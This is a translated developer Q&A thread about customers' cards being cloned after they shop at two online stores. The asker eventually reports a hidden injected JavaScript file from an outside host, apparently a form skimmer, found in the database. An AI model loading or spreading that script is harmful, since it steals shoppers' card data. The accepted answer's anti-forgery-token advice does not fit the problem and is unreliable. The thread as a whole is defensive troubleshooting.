How can you clone cards on my website?

Asked

Viewed 235 times

5

what is occurring is the following. I am currently trying to solve a big problem, two of the company’s online stores that I serve are having a problem with card cloning. I don’t have much experience in this, but I will explain how the card system is working today.

1) Customer informs the card details in the shopping cart.
2) An ajax sends this information to a file. It and processes the payment and returns the return.

The shops:

  • Use SSL.
  • Save nothing in the card database.
  • Server says no virus.

What actions can I take to try to solve this? Speaking of programming.

php html asp.net-mvc asp

  • Do any employees have access to this information? You checked the access log on the server to see if there is someone coming in and capturing something?

  • no one has access, the information is not recorded anywhere.

  • And there’s no way they could’ve gotten the information "in transit" during validation... Type a bot that is waiting for the event to run and takes what is in the script something like?

  • Is this also my question? How can I avoid this? What treatment to use? How can I find out if this is it?

  • when the guy registers on your site his credit card is not recorded even ? all purchases he makes he will have to write the card number ?

  • 1

    How this bot will break SSL security??

  • nothing is saved. Every time you have to write everything down;

  • 1

    ajax that sends the data to . Asp tbm sends the data by ssl ?

  • Yeah, your $.ajax() has something like url: 'https://blablabla.com/blablabla'?

  • yes, it has the url or at least it is possible to identify it by inspecting. How do I resolve?

  • if the url your ajax sends to . Asp uses ssl, things don’t smell right to me :-(

  • I did not get to look at it, it may be that the destination url, the one that receives the post and processes the payment data do not use ssl.

  • But there https in url:?

  • ajax is sending the post to the file, example: payment_card.asp. It does not have the full url in the ajax call.

  • 1

    there was an Injection of this javascript in the system database, https://cdn.rawgit.com/0shrk/web/master/p.js it is strange to the functionality of the store, it must have been this.

Show 10 more comments

2 answers

4

Come on, based on the information from your comments, we’re outside with no access to the logs, no access to the server, no access to your codes, we can only assume where the problem is happening.

 - Usam SSL.

If all communications use SSL the problem dies here... when I say todas as comunicações I mean that your site should do all communication between browser(client) and your server via https:, another point is whether your ajax sends the data to the .asp using communication SSL, if the answer is OK, it would be very difficult for someone to intercept (sniffar, spoofar) the communication between browser(client) and server(Nginx, apache, IIS, etc), it would also be very difficult to forge the SSL to try to take the data naked way...

If sending the data between your ajax and the .asp is not encrypted, any sniffer or arp spoof running on the network where your server is able to read this information, the same happens on the network where you are receiving the data, in your case the network where is the .asp, in both cases you are hostage, have no control over any of the networks, sit and cry, or ensure that everything is encrypted

- Não salvam nada no banco de dados referente ao cartão.

If you guarantee that nothing is saved anywhere, forget about database intrusion problems and sql injections

 - O Servidor disse que não tem virus.

This is very vague, the problem may be occurring here yes, it can be server or vulnerability in your code, it is of no use everything to be encrypted via ssl, if your server is compromised, some ftp port open, open ssh port, something that can be exploited by exploits and allow full access to the server, this would ensure that the attacker changes codes in a hidden way and sends forms to his server/pc/database... the same can happen with his php/Asp codes, if you have any holes in them, the attacker can insert hidden codes into your server without you taking any notice.

Imagine that the Hacker get a way to access your server, it can achieve this by exploiting http/ssh/ftp/exploits/loopholes in code(php, Asp), etc, imagine I’m in the form and I’m typing my credit card number, ok the data is encrypted via ssl once I hit the Submit no one in theory could read the transaction, but the data in the form contained on the server side is not encrypted, someone could enter something in the code that saved or sent this data...

  - Quais ações posso tomar para tentar resolver isso? Falando em   
    programação

Not knowing for sure where the problem is :-(

  • Read on this case https://blog.sucuri.net/portugues/2017/09/security -de-ecommerce-jquery-falso-rouba-credit cards.html

  • @Marcosxavier yes exactly, it is only possible to insert something in the code if the server is compromised in some way, this is what I wrote about in the penultimate and last paragraph :-(

  • Exactly, the link post has some suggestions. I believe it is one of the first steps for you to audit and resolve the failure. Check on the possibility of javascript Injection, is an assumption since I do not know how the system is designed

1


You are using anti-fraud token (Antiforgerytoken)?

It may be that in the payment of the shopping cart, instead of clicking once, the customer is double-clicking the Pay button.

If this is happening and you do not use the token, the payment will be processed more than once.

If you validate tokens of this type, once the user has made the POST of the <FORM> payment token and used a token, the token will no longer be valid and new attempts to use that token, which would happen if he pressed the token countless times, will fail.

To use Antiforgerytoken, simply decorate the controller method with:

[ValidateAntiForgeryToken]
[HttpPost]
public ActionResult Pagar(PagamentoModel model)
{
    ....
    return View();
}
  • 5

    Marcelão, no offense ok, but just to give you the same touch. Don’t you think that the comment field would be more suitable for your questioning? It is not correct to use the answer field to ask questions and ask questions about the question....

  • 1

    Blz vlw flw abs

  • Marcelo, no, but I don’t think it would cause the problem of cloning the card. The problem is that those who buy in stores have the cloned card. However, none of the card is saved in the database.

  • How did you know that the card(s) (s) were cloned? If there is a screening of this cloning, perhaps it would be easier to understand. Did you receive two or more times for payment on the same card? If so, then it costs no money to check as the user operated his shopping cart.

  • 1

    No, the problem is that those who buy on my sites, complain that they tried to buy with their card on other sites (other stores) later, and this started to get very frequent. After shopping in my stores, there are attempts to shop in other places that the owner of the card does not recognize.

  • 2

    Have you checked if you are not using JS from other hosts other than yours? It may be that some JS your or some CDN that has JS yours is vulnerable?

  • You’re not wearing no.

  • 1

    Hello everyone, just this @Marcelouchimura found in the very hidden bank an Injection of this javascript that is strange to the system. https://cdn.rawgit.com/0shrk/web/master/p.js I believe this is it.

  • Okay, @Andersonnunes, thanks for the answer. Please provide an overview of the site for vulnerabilities with SQL Injection.

Show 4 more comments

Browser other questions tagged php html asp.net-mvc asp

You are not signed in. Login or sign up in order to post.